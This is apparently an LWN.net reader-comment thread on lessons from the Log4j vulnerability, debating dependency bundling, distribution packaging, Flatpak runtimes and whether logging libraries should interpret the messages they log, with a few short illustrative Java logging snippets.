> IMHO that doesn't count as "bundling" because, in most cases, at least on modern systems, the thing that is bundled is a binary blob self-extracting installer you got from upstream, and you are in no way allowed to just install random DLLs into your Program Files directory.

That was always an option, not the requirement. That's why, after you wrote that, I went and verified that /MT is where it has always been. Even with the just-released Visual Studio 2022.

> Sometimes, there isn't even a reasonable way to determine whether the thing is already installed or not, so you end up doing extra-crazy things like re-running the same installer over and over again (see https://help.steampowered.com/en/faqs/view/2BED-4784-8C0A...).

Ah. Thanks for providing that link. Now, please go read what's written there yourself. Yes, with DirectX it's done like that. And, later, the trick was repeated with the .NET Framework.

But there is an extremely important difference between what was done there and in the Linux world. Microsoft decided from the very beginning that there would be one DirectX and one .NET runtime (later they added a few more, but the original ones are all still supported). And they ensured that programs built for DirectX 1.0 (released in 1995, remember?) would still work today (there are some bugs which may prevent it, but there has been no on-purpose breakage since 1995, for a quarter-century).

And when they had that promise in place, they started working on legal enforcement. And yes, that combination of technical and legal solutions works.

What Linux libraries can you name which support similar technical promises? Glibc? Well, congrats: even the most super-duper-bundle-savvy apps very rarely bring their own version of glibc. Even if, technically and legally, they can.

The important part of the solution (outlined in the link you shared, ironically enough) was not done for glibc (there is no way to bring your own version of glibc and install it), but the glacial speed of development worked as an adequate substitute: glibc is so low-level and changes so slowly that using a 5-year-old version is not too painful.

Yeah, that's a rare success. Of the glibc developers, not the distro makers, though. Everyone else liked to play CADT games, which made the distro makers' desire to have just one copy of each library unrealistic: where there is no compatibility between versions there will be bundling… it's as simple as that.

Yet distributors tried to fit that square peg into a round hole for decades… with very little success.

I'm also guilty: I tried to help with the creation of one local distribution, years ago, got fed up with all these incompatibilities (when we tried to somehow invent a way to run apps from Red Hat on our distro) and switched back to Windows.

Dependency bundling

Posted Dec 20, 2021 18:36 UTC (Mon) by NYKevin (subscriber, #129325) [Link]

> Everyone else liked to play CADT games

Side note: As someone who was actually diagnosed with AD(H)D, I really wish people would stop using my condition as a pejorative.

Or claiming that it doesn't exist, for that matter.

Dependency bundling

Posted Dec 19, 2021 13:36 UTC (Sun) by smurf (subscriber, #17840) [Link] (1 responses)

Yeah, and then you have a library linked against FooLib 3.2, another library using FooLib 3.3, and no way to prevent these two from stepping on each other's toes when you try using them in the same application.

The Distribution approach ("there is exactly one copy of FooLib on the system which everybody uses, it gets security fixes only; if you need a newer copy you get to wait for the next distro release") may not be for everybody but at least it solves *that* problem.

Dependency bundling

Posted Dec 19, 2021 13:49 UTC (Sun) by khim (subscriber, #9252) [Link]

> Yeah, and then you have a library linked against FooLib 3.2, another library using FooLib 3.3, and no way to prevent these two from stepping on each other's toes when you try using them in the same application.

Of course there are ways to prevent that! Windows never had that problem in the first place. And Android implements a way to solve it.

Not sure what macOS is doing, but I hope it has either avoided the problem in the first place (like Windows) or solved it (like Android).

> The Distribution approach ("there is exactly one copy of FooLib on the system which everybody uses, it gets security fixes only; if you need a newer copy you get to wait for the next distro release") may not be for everybody but at least it solves *that* problem.

True. If your sausage is raw and undercooked, then go and burn the whole house down. That sure would solve that issue: most likely you would have no sausage to worry about, but if it did, by some freak chance, survive, then it would be well done.

Dependency bundling

Posted Dec 18, 2021 1:01 UTC (Sat) by pabs (subscriber, #43278) [Link]

Not all developers have abandoned this model. At my workplace the rule is that everything must be in Debian packages in our internal repo and the open source ones have to be pushed back to Debian and removed from our internal repo when that is done. I expect there are other companies that also do something like this.

Dependency bundling

Posted Dec 18, 2021 4:23 UTC (Sat) by sionescu (subscriber, #59410) [Link] (1 responses)

Those young programmers who "create the systems the users love to use" will end up with a system that is a nightmare for software maintenance and security, because their whole approach to dependencies is to run "npm update" (or the Ruby/Python equivalent) every now and then. If they get acquired by a large company, the biggest M&A risk is that they will have to do a major refactor or even rewrite in order to fix that mess.

Dependency bundling

Posted Dec 19, 2021 14:28 UTC (Sun) by khim (subscriber, #9252) [Link]

> If they get acquired by a large company, the biggest M&A risk is that they will have to do a major refactor or even rewrite in order to fix that mess.

Highly unlikely. More likely: they would be told to make sure CI/CD can run without internet access and that would be it.

The solution is to take all the bazillion dependencies and put them into one repo. Then never update.

You may guess how wonderfully this would improve security of the whole thing.

Dependency bundling

Posted Dec 16, 2021 21:44 UTC (Thu) by hkario (subscriber, #94864) [Link] (3 responses)

But if you tell the developers that production doesn't have the absolute most recent, bleeding-edge version of a package, they will say that they literally can't do their job. /s

Dependency bundling

Posted Dec 17, 2021 20:46 UTC (Fri) by khim (subscriber, #9252) [Link] (2 responses)

That also makes sense. If you find a bug in a library you are using (not too serious, unlike what you have in log4j, so without the need to rush and upgrade everything ASAP) and you get it fixed in the base version of the package… then it may take years before you can rely on that fix. And that's just silly: you need to ship a working program much sooner.

Bundling is the obvious solution. Maybe not the best solution, though… well, what other solution is there? Bundle the version which works and use the system version if it's new enough? That leads to combinatorial explosion very quickly and makes everything unreproducible and untestable.

Dependency bundling

Posted Dec 21, 2021 15:16 UTC (Tue) by Chousuke (subscriber, #54562) [Link] (1 responses)

Years? Build your production software on a platform that has support. With RHEL, you would pay Red Hat for support; something blocking your development? Open a support ticket with Red Hat and have it fixed. If you're building for RHEL, you might even have a koji setup for your packages so you could also build a custom, patched RPM if RHEL support somehow takes too long. It's not difficult.

If you vendor dependencies, you assume full responsibility for monitoring those dependencies. With a distribution, you only need to monitor what the distribution does. A security issue in a dependency provided by the distribution is not on you to find and fix.

Sure, you might be limited to using older versions of some dependencies depending on which platforms you support. That is not automatically a downside.

Your software does not need to support every platform under the sun when run in production; it's perfectly fine to tell someone that you only provide upstream production support for eg. RHEL 8 or newer, Ubuntu 20.04 or newer, and nothing else.

If you're an open source project, you would publish releases in source form and let distributors take care of it; maybe engaging with a few platforms that you want to explicitly support to get your software packaged.

I don't know why it seems to be so common to think that once you write software it should run on some random hyper-customized Gentoo-NixOS frankenstein of a platform just because it's "Linux".

Dependency bundling

Posted Dec 21, 2021 18:55 UTC (Tue) by khim (subscriber, #9252) [Link]

> Build your production software on a platform that has support.

Who would pay for it?

> If you vendor dependencies, you assume full responsibility for monitoring those dependencies.

No. Why should you? They are bundled, they don't change, they work.

> With a distribution, you only need to monitor what the distribution does. A security issue in a dependency provided by the distribution is not on you to find and fix.

Most people (including most developers) spend maybe 5 minutes a year thinking about security. 15 if you're lucky. You may not like it, but that's how it works.

They cannot (and won't!) pick any solution which asks them to regularly “monitor” something.

Thus they bundle dependencies, since that works. As the examples of Android/DirectX/ChromeOS show, they may accept an unbundled solution where someone else monitors things.

But if you say “for this solution to work, developers have to monitor XXX”… then it doesn't even matter what XXX is: developers cannot and will not monitor it. Period. Not even worth discussing.

They are paid to solve users' problems, not to monitor anything!

> Your software does not need to support every platform under the sun when run in production; it's perfectly fine to tell someone that you only provide upstream production support for eg. RHEL 8 or newer, Ubuntu 20.04 or newer, and nothing else.

What about the most common type of software, which is never updated and not supported unless something breaks and you are forced to visit a freelance site and find someone who can fix it?

> I don't know why it seems to be so common to think that once you write software it should run on some random hyper-customized Gentoo-NixOS frankenstein of a platform just because it's "Linux".

Why shouldn't it? Any OS is only as good as the software it enables. And the majority of software is only ever written once, never updated, and used till it breaks.

Just one simple fact: there are more than 30 million businesses in the US, and the population is 330 million. Just what kind of software can a typical business afford? Just think about it. The answer is: a very simple one, requiring maybe a week of work from a software developer (but it would be nice if it required less).

And then you come and say: you have to monitor that and you have to support this. How? Who would pay for that? Are you offering? For all these millions of businesses?

And before you come and say that most of these businesses don't purchase any software: of course they do! They have their own [tiny] web sites with some scripts cobbled together from Google Docs and some Frankenstein on a VPS. They have some scripts for Excel or Access.

All that is software, too. And, the most important part: there is no hard line which separates that software from something like WhatsApp. There is a continuum of software between these hairy Excel scripts and an auto-updating browser backed by dozens of software engineers.

And the majority of software is closer to Excel scripts than to said browser. Even if scripts are built on top of JavaFX in a system which uses log4j.

Dependency bundling

Posted Dec 16, 2021 22:08 UTC (Thu) by rgmoore (✭ supporter ✭, #75) [Link] (1 responses)

I hope that after these fires have been put out we all sit down and have a serious re-think about the downside of bundling dependencies.

It would indeed be great if people learned this, but this isn't the first time there's been a critical security flaw with a bundled dependency. If people didn't change after the last time this happened, it requires great optimism to think they'll change this time. There are deep reasons people like bundling, and we need to work on those reasons before they'll be convinced to change.

Dependency bundling

Posted Dec 19, 2021 11:44 UTC (Sun) by farnz (subscriber, #17727) [Link]

This is where good systems for handling bundling come into play. For example, Fedora RPMs that include bundled packages have metadata that indicates what you bundled, and what version is bundled.

On the developer side, Rust's Cargo tool is set up so that the easy way to bundle a dependency is to document it in your build metadata and ask Cargo to copy it in. This sort of thing makes it relatively manageable to unbundle dependencies - you know what was bundled (thanks to Cargo's metadata files), and can compare that to what you have bundled to see if there are hidden changes.

Dependency bundling

Posted Dec 17, 2021 5:38 UTC (Fri) by bartoc (guest, #124262) [Link] (1 responses)

Have you actually looked at what's required to "unbundle" dependencies for Java programs? It's... not pretty, and has burned out quite a few distro maintainers.

I agree though, build systems really do need to support unbundling. Java build systems in particular are a nightmare though, some make autotools look genuinely simple and pleasant!

Dependency bundling

Posted Dec 17, 2021 16:47 UTC (Fri) by seyman (subscriber, #1172) [Link]

Let's start small, then...

It would be great if applications that package dependencies could include a MANIFEST-like file that documents their dependencies. For each one, it could state what version is bundled, if it has been modified from upstream's version and why it is bundled.

That alone would be a huge step forwards.

Dependency bundling

Posted Dec 17, 2021 8:12 UTC (Fri) by nirbheek (subscriber, #54111) [Link] (6 responses)

Small correction: Flatpak apps do not bundle their own dependencies. They pick them up from "runtimes" which are bundles of libraries that are shared between Flatpak apps.

So if you install 5 apps using rpm and 10 apps with Flatpak, you will only have two copies of a library — except if an app requires an older runtime for compatibility reasons, but that's not a new problem.

Dependency bundling

Posted Dec 17, 2021 9:14 UTC (Fri) by z3ntu (subscriber, #117661) [Link] (2 responses)

That's only true if the dependency is included in the runtime. Many more esoteric dependencies (or really anything other than base libraries) are bundled by each and every Flatpak app on its own. E.g. for the VLC flatpak you can see a long list of bundled dependencies here: https://github.com/flathub/org.videolan.VLC/blob/master/o... If a security vulnerability is found in, e.g., libssh2, then the VLC flatpak needs to be fixed on its own, as do all the other flatpaks bundling libssh2.

Dependency bundling

Posted Dec 17, 2021 14:23 UTC (Fri) by nirbheek (subscriber, #54111) [Link] (1 responses)

Like you say, esoteric dependencies are the main candidate for bundling, which seems fine to me from a security perspective.

For things like libssh2, I would want Flatpak / Flathub to have a system for checking whether multiple apps on the repo have the same dependency, so that it can either be added to an existing runtime, or a new runtime can be created that contains it. It might already have such a system, since it's easy to automatically detect it from the app manifests.

Dependency bundling

Posted Dec 17, 2021 16:48 UTC (Fri) by nim-nim (subscriber, #34454) [Link]

> Like you say, esoteric dependencies are the main candidate for bundling, which seems fine to me from a security perspective.

One man’s esoteric dependency is another’s must-have.

The JVM is the archetypal runtime: it bundles all kinds of features so that Java devs need not use any esoteric dependency. Fast-forward a few decades, and Java devs use everything except what is bundled (log4j is not the sole example).

The batteries-included runtime model only works at first, when it is new and shiny and app-dev interests are perfectly aligned with runtime-dev interests (mainly because there is nothing but the runtime to choose from).

Over time, runtime devs become reluctant to deprecate runtime parts (because of the installed base) and clash with people proposing alternatives (because they, as official runtime devs, know best), so there is a natural drift of app devs towards “esoteric” runtime alternatives.

The ultimate result of a successful runtime is lots of people using esoteric deps (aka runtime alternatives). And that result is better served by a granular dependency system than by a batteries-included model that posits perfect runtime-dev and app-dev alignment over the long run.

That’s not a reflection on specific human beings; that’s how we behave in general.

Dependency bundling

Posted Dec 17, 2021 10:40 UTC (Fri) by zdzichu (subscriber, #17118) [Link] (2 responses)

With Flatpak, after some time, you will have more copies of the library, because there is apparently no garbage collection of old runtimes:
Fedora Platform    org.fedoraproject.Platform     34       f34    fedora    system
Fedora Platform    org.fedoraproject.Platform     35       f35    fedora    system
Freedesktop Platf… org.freedesktop.Platform       20.08.15 20.08  flathub   system
Freedesktop Platf… org.freedesktop.Platform       21.08.4  21.08  flathub   system
Mesa               …eedesktop.Platform.GL.default 21.1.7   20.08  flathub   system
Mesa               …eedesktop.Platform.GL.default 21.2.2   21.08  flathub   system
Intel              …edesktop.Platform.VAAPI.Intel          20.08  flathub   system
Intel              …edesktop.Platform.VAAPI.Intel          21.08  flathub   system
ffmpeg-full        …edesktop.Platform.ffmpeg-full          20.08  flathub   system
ffmpeg-full        …edesktop.Platform.ffmpeg-full          21.08  flathub   system
GNOME Application… org.gnome.Platform                      3.38   flathub   system
GNOME Application… org.gnome.Platform                      40     flathub   system
GNOME Application… org.gnome.Platform                      41     flathub   system
Of course, unused runtimes are not a threat; they only occupy disk space.

Dependency bundling

Posted Dec 17, 2021 12:12 UTC (Fri) by atnot (subscriber, #124910) [Link] (1 responses)

There is garbage collection of runtimes, but only when they become EOL. IIRC the thinking is that repeatedly having to wait for them to be re-downloaded is usually more annoying than them using a bit of disk space. You can still garbage collect them manually with `flatpak uninstall --unused` though.

Dependency bundling

Posted Dec 18, 2021 21:45 UTC (Sat) by JanC_ (guest, #34940) [Link]

A “bit” of disk space that can grow to eat half the available disk space on some systems…

It’s basically just insane to keep filling up disk space with (often unused!) runtimes.

snaps & flatpaks...

Posted Dec 19, 2021 15:40 UTC (Sun) by Herve5 (subscriber, #115399) [Link]

>>But even in the Linux world we're leaning more and more on snaps and flatpaks, making such problems more likely there, too.
My thoughts exactly...

Lessons from Log4j

Posted Dec 16, 2021 21:20 UTC (Thu) by ibukanov (subscriber, #3942) [Link] (2 responses)

The question is why one needs to depend on a separate logging library in Java in the first place. Java these days should include plenty of logging options.

Lessons from Log4j

Posted Dec 17, 2021 5:33 UTC (Fri) by joib (subscriber, #8541) [Link] (1 responses)

There is java.util.logging shipped as part of the JDK, but apparently it sees little usage compared to log4j.
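For reference, a minimal sketch of what using the JDK's built-in logging looks like (the class and variable names here are made up):

    import java.util.logging.Level;
    import java.util.logging.Logger;

    class LoginHandler {
        private static final Logger log = Logger.getLogger(LoginHandler.class.getName());

        void reportFailure(String userName) {
            // java.util.logging uses MessageFormat-style {0} placeholders;
            // the untrusted value is passed as a parameter, not concatenated into the pattern.
            log.log(Level.WARNING, "User {0} not found", userName);
        }
    }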

Lessons from Log4j

Posted Dec 18, 2021 23:06 UTC (Sat) by gfernandes (subscriber, #119910) [Link]

Log4j itself fell out of favour some time back. Most not-so-modern Java projects use Logback, with a bridge to the log4j API to allow application components that need log4j to work.

Needless to say, Logback is not vulnerable in the same way.
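Code written against the SLF4J API (which Logback implements) looks nearly identical to log4j usage, which is what makes swapping the backend and bridging old log4j calls practical. A minimal sketch, assuming Logback as the backend and with invented names:

    import org.slf4j.Logger;
    import org.slf4j.LoggerFactory;

    class LoginHandler {
        private static final Logger log = LoggerFactory.getLogger(LoginHandler.class);

        void reportFailure(String userName) {
            // Logback's {} substitution just copies the value into the output;
            // it does not run lookups on the message content.
            log.warn("User {} not found", userName);
        }
    }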

Lessons from Log4j

Posted Dec 17, 2021 7:07 UTC (Fri) by iabervon (subscriber, #722) [Link] (3 responses)

One thing I haven't been able to determine (having never used log4j 2) is whether lookups in messages are actually intended functionality at all. The manual only seems to mention that you can use them in configuration (and if attackers are writing your logger configuration, you've already got problems that are probably easier to exploit than RCE). The documentation of logging functions says that it does handle formatting, but only out of the arguments passed to the function. So I'm confused that they seem to be trying to remove hazardous lookups from the lookup environment, rather than just not using a string processing function with unexpected behavior for the strings that are untrusted input. Are people relying on any lookups in messages for legitimate use?

Check the Wayback Machine

Posted Dec 17, 2021 23:52 UTC (Fri) by tialaramex (subscriber, #21167) [Link] (2 responses)

The next highest priority after fixing the code was to fix and replace the documentation.

A month ago, Apache Log4j2's documentation proudly explained that lookups, including recursive lookups, were a great feature and that, although a mechanism was provided to turn them off, you should think twice before doing so. When 2.15.0 shipped, that was gone, and the documentation explained what was true all along: that this is incredibly dangerous and you shouldn't do it, but it was available if you needed it. I assume this was further refined for 2.16.0. If you're wondering what it used to look like, check the Wayback Machine as I did.

Java thinks the variable userName I got from my HTTP endpoint and the string literal "User {} not found" are exactly the same kind of thing: Strings. So even if they told Java developers not to write log(userDefinedValues), they couldn't put any force behind such a requirement. And since the rest of Java lacks format handling, it's pretty usual for Java programmers to write ("stuff" + like + " " + this) or, if they're more disciplined, to use a StringBuilder to reduce the allocation overhead. Both of those ensure that, even if you pretend your interface is log(format, param1, param2, param3), it's always used as log(userDefinedValues) anyway, because the caller smashes everything into a single String before even trying to log it.

As I understand it, in Swift you can say that this parameter must be a string literal, and when the programmer tries log(userDefinedValues) it doesn't compile because the type doesn't match. In Rust, you can't do that, but they luck out because their formatting is built out of macros, so the *macro* language needs to parse the format string, which must happen at compile time. As a result, format!(userDefinedValues) won't compile, whereas format!("{}", userDefinedValues) does what you want and isn't confused by whatever is in userDefinedValues at runtime.
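To make the Java side of that concrete, here is a minimal sketch (using the Log4j 2 API; the class and variable names are invented) of why the library cannot tell a trusted pattern from untrusted data:

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    class LoginHandler {
        private static final Logger logger = LogManager.getLogger(LoginHandler.class);

        void reportFailure(String userName) {  // userName comes from the request, i.e. attacker-controlled
            // Both calls compile: Java cannot require the pattern argument to be a string literal.
            logger.error("User " + userName + " not found");  // user data becomes part of the pattern
            logger.error("User {} not found", userName);      // pattern stays a literal; data passed separately
            // Note: in the vulnerable Log4j 2 releases even the parameterized form was exploitable,
            // because lookups were applied to the formatted message, not just the pattern string.
        }
    }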

Check the Wayback Machine

Posted Dec 18, 2021 7:13 UTC (Sat) by iabervon (subscriber, #722) [Link]

The only place I can find a mention of lookups in messages in the documentation from a month ago was in the middle of the long "Configuration" page, where it said that they were on by default and how to turn them off. I'm only finding a suggestion that you should write your code with lookups in configuration files, and toString() and Formatter-style substitution in your messages, both of which are reasonably safe. (If you stick user-supplied data into a Formatter-style substitution, you may get an exception when it references more arguments than the call has, but it can't do anything other than sensible conversions of arguments passed to the function, and there normally just won't be any if you were building the text yourself.)

It looks like there was a suggested feature of configuring your output layout to include looking things up in a context, and this was also insecure due to the recursive nature of lookups, but that wasn't the default configuration problem that's hitting everything that used log4j2.

Check the Wayback Machine

Posted Dec 24, 2021 7:34 UTC (Fri) by spigot (subscriber, #50709) [Link]

Interestingly, in late November the JEP draft "Templated Strings and Template Policies (Preview)" was updated. As one of its goals it lists:
  • Templated string injection attack prevention will be of primary concern. The result of template processing can to [sic] be used in sensitive applications, such as database queries. Validation of templates and expression values prior to use can prevent catastrophic outcomes.
Hopefully the Log4j 2 incident will provide an impetus for this work.

Lessons from Log4j

Posted Dec 17, 2021 15:54 UTC (Fri) by nim-nim (subscriber, #34454) [Link] (10 responses)

> Normally, one thinks that a logging utility should accept data of interest and reliably log it. Log4j seemingly does this, but it also does something that, arguably, no logging system should do: it actively interprets the data to be logged and acts upon it.

Any semi-useful logging system will do that. The data produced by the logger is minimal (logging is expensive); you need to complete it with something else for it to be useful; you cannot defer completing it, because that something else's state also changes over time; and completing requires some parsing of the data being completed.

That was already the case for paper ships' logs: sailors would log all kinds of things (such as the weather) in addition to their own decisions, and the logs would link all that data together (interpret things).

Log4j’s failure is not in interpreting logged data. Log4j’s failure is, first, in failing to sanitize logged data before interpreting it and, second, in agreeing to use non-vetted external third-party code for the interpreting.

Lessons from Log4j

Posted Dec 17, 2021 17:16 UTC (Fri) by MarcB (guest, #101804) [Link] (6 responses)

How does enriching logs require parsing them?

Usually a logging system will have the raw message, some additional static information (like severity) and some dynamic information (like timestamp, scope, PID, ...). All of this is inherently trustworthy.
None of this even requires looking at the raw message. All a sane log system will do is enforce some limits on it (size, output encoding, ...).

The root cause of this mess is that Log4j went further and actually started interpreting the raw data. If there is any lesson to be learned here, it is "respect complexity".
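A minimal sketch of how that enrichment typically works in practice (assuming the SLF4J MDC; the field names are illustrative): context data is attached out of band and the output layout appends it (e.g. via %X{clientIp}), so the raw message never needs to be parsed.

    import org.slf4j.Logger;
    import org.slf4j.LoggerFactory;
    import org.slf4j.MDC;

    class RequestLogger {
        private static final Logger log = LoggerFactory.getLogger(RequestLogger.class);

        void handle(String clientIp, String userId, String untrustedMessage) {
            MDC.put("clientIp", clientIp);   // a layout pattern like %X{clientIp} adds this to every line
            MDC.put("userId", userId);
            try {
                log.info("{}", untrustedMessage);  // the message itself is only copied, never interpreted
            } finally {
                MDC.clear();
            }
        }
    }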

Lessons from Log4j

Posted Dec 18, 2021 17:51 UTC (Sat) by nim-nim (subscriber, #34454) [Link] (5 responses)

>How does enriching logs require parsing them?

Pretty much every time some info is replaced by expanded values or compared with some other info source (user name instead of user id, FQDN instead of IP, numeric timestamp with full local time, outcome of processing node A with outcome of processing node B).

The raw local numeric values the logger process captures are not terribly useful as-is.

The only thing that changes is the amount of parsing and reprocessing (see also syslog pipelines, this was not invented yesterday).

Lessons from Log4j

Posted Dec 18, 2021 23:10 UTC (Sat) by gfernandes (subscriber, #119910) [Link]

Replacing variables with locally available data is one thing. Deciding to go over a URL to fetch that data is a different thing altogether.

Lessons from Log4j

Posted Dec 20, 2021 9:32 UTC (Mon) by MarcB (guest, #101804) [Link] (3 responses)

> Pretty much every time some info is replaced by expanded values or compared with some other info source (user name instead of user id, FQDN instead of IP, numeric timestamp with full local time, outcome of processing node A with outcome of processing node B).

But that should never be parsed from the log message. The IP address or user id is already known to the logging application and then mapped via some pre-configured mechanism.

Lessons from Log4j

Posted Dec 20, 2021 10:07 UTC (Mon) by nim-nim (subscriber, #34454) [Link] (2 responses)

In simple setups mostly yes.

In more complex setups the bit that manipulates some data has no need to understand some of this data, but you still want the logs to expand it, because analysing problems needs more context.

So quite often logged data goes through some processing that the bit of code doing the logging has no need of itself. People may hide this processing in another part of the app, in a third-party lib, in plugins, or even by invoking third-party executables shell-style (all of which may make remote network calls, BTW). But this processing exists.

It’s the historical default *nix approach, BTW: unstructured logging with lots of reprocessing came before structured logs, which force the log emitter to put its data into order (more) directly.

Lessons from Log4j

Posted Dec 20, 2021 15:04 UTC (Mon) by MarcB (guest, #101804) [Link] (1 responses)

Log processing afterwards is something else, and it is outside the scope of log4j or any logging library.

And yes, ideally you would create structured logs - precisely to avoid having to parse the raw log message. Parsing unstructured logs is only acceptable if there is no better solution; i.e. when you cannot adjust the logging application. For a library like log4j - which is generating the logs in the first place - it makes no sense whatsoever.

For our in-house applications we have long since switched to a dual logging approach: classic unstructured logs stored locally and structured logs sent to logging infrastructure. The local logs would only be relevant in the (so far hypothetical) scenario of a major infrastructure outage.
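As a rough illustration of that dual approach (entirely hand-rolled here and therefore just a sketch; real setups would use a JSON encoder from the logging framework and proper escaping):

    import java.io.PrintWriter;
    import java.time.Instant;

    class DualLogger {
        private final PrintWriter plainLog;       // classic unstructured log, kept locally
        private final PrintWriter structuredLog;  // JSON lines shipped to the logging infrastructure

        DualLogger(PrintWriter plainLog, PrintWriter structuredLog) {
            this.plainLog = plainLog;
            this.structuredLog = structuredLog;
        }

        void info(String event, String user, String message) {
            Instant now = Instant.now();
            plainLog.printf("%s INFO %s user=%s %s%n", now, event, user, message);
            // Each field is emitted separately, so consumers never have to parse the text message.
            structuredLog.printf("{\"ts\":\"%s\",\"level\":\"INFO\",\"event\":\"%s\",\"user\":\"%s\",\"msg\":\"%s\"}%n",
                    now, escape(event), escape(user), escape(message));
        }

        private static String escape(String s) {
            return s.replace("\\", "\\\\").replace("\"", "\\\"");
        }
    }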

Lessons from Log4j

Posted Dec 20, 2021 18:14 UTC (Mon) by nim-nim (subscriber, #34454) [Link]

The basic point is that most logged data needs massaging to be useful, no matter where you hide this massaging (in your own code, in a logging lib, in something invoked over jndi, in an external process).

The massaging is not an exception, and it would not exist without choices made logger-side.

Lessons from Log4j

Posted Dec 17, 2021 17:23 UTC (Fri) by smurf (subscriber, #17840) [Link] (2 responses)

> Log4j’s failure is not in interpreting logged data, Log4j’s failure is first in failing to sanitize logged data before interpreting

Wrong. It's RANDOM EXTERNAL DATA. There is no freakin' POINT in even TRYING to interpret ANY of it.

Sorry for shouting, but … is this really that hard to comprehend?

(In a sane world we would be 20 years past the obvious "well, obviously yes since log4j stepped into that one" answer …)

Lessons from Log4j

Posted Dec 18, 2021 18:19 UTC (Sat) by nim-nim (subscriber, #34454) [Link]

Don’t be ridiculous: even something as basic as a web server or SMTP server will do some processing of random externally supplied data, if only to format, classify, and cross-reference it and make sure the result is something that can be read later.

A raw, unfiltered copy of external data is not a log; it’s a capture (which will be interpreted by the capture viewer, because raw data is useless as-is).

As with any processing of externally supplied data, you need to check how the code that processes this data could be abused and sanitize the external data against that. That’s where log4j failed (in a gross way).

Lessons from Log4j

Posted Dec 21, 2021 11:46 UTC (Tue) by k8to (guest, #15413) [Link]

The point is, essentially, that sanitizing data is something you do when you want to ensure that the data fits within sane expectations so that your software can, you know, operate on it.

From the perspective of a logging system, the text being logged is not something that should be "operated upon". That should be explicitly avoided.

Sanitization is never anywhere near as safe as simply not processing the data computationally at all.

The only thing you usually want to do to "sanitize" data in a logging system is make some decisions about how to handle really unexpected cases, like requests to log giant things such as hundreds of kilobytes of data. Most logging systems simply truncate these after any formatting, or try to be clever and avoid unnecessary format building if the result will be unnecessarily large. But this is really just a subset of the "formatting" task, i.e., placing various data blobs into the logged item. There is no need whatsoever to take the data blobs and perform any computational task beyond "turn into string".

In a sane logging system and language, "turn into string" is not something that can trigger unexpected call paths.
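For what it's worth, the harmless handling being described amounts to little more than something like this (a hedged sketch, not any particular library's code):

    // Cap the size of the already-formatted text without interpreting it in any way.
    static String truncate(String formatted, int maxLen) {
        return formatted.length() <= maxLen
                ? formatted
                : formatted.substring(0, maxLen) + "... [truncated]";
    }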

random comment

Posted Dec 18, 2021 20:07 UTC (Sat) by linuxjacques (subscriber, #45768) [Link]

This word "random" - I don't think it means what you think it means.


Copyright © 2021, Eklektix, Inc.
This article may be redistributed under the terms of the Creative Commons CC BY-SA 4.0 license
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds